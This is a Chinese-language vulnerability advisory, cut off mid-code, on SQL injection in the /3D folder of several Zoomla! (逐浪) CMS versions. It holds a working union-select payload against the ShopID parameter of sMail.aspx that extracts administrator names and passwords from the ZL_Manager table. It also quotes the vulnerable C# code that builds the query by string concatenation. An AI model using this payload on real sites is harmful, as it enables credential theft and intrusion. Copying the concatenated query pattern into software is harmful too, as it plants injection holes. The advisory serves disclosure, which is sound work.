逐浪CMS一个文件夹9款注入姿势影响版本cms4.1 CMS2_x1.5...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 影响版本Zoomla!cms4.1源码Zoomla!CMS2_x1.5源码 Zoomla!CMS6.0 Zoomla!逐浪CMS2_x1.4正式版 此文件夹注入点蛮多的 厂商需努力呀 ### 详细说明: 文件目录3D 注入1 文件/3D/1sMail.aspx 问题阐述 ShopID 测试: ``` http://192.168.10.19:9992/3d/sMail.aspx?ShopID=1000000 union/**/ all select/**/ 1,2,'3','4','5','6','7','8','9',STUFF(adminPassword , 1, 0, AdminName),11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager ``` 代码片段如下 ``` if (base.Request.QueryString["ShopID"] != null) { string text = base.Request.QueryString["ShopID"].ToString(); this.HiddenField2.Value = text; DataTable dataTable = this.bdu.Select_Where(" Dutype=1 and DuShow=" + text, " * ", ""); if (dataTable.Rows.Count <= 0) { base.Response.Write("<script>alert('error');location.href='Default.aspx'</script>"); return; } this.txtSend.Text = dataTable.Rows[0]["DEmail"].ToString(); } ``` 虽然 Select_Where方法调用的存储过程进行了参数化 但是咱们看如下代码片段 ``` public DataTable Select_Where(string strSQL, string strSelect, string Orderby) { string cmdText =...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息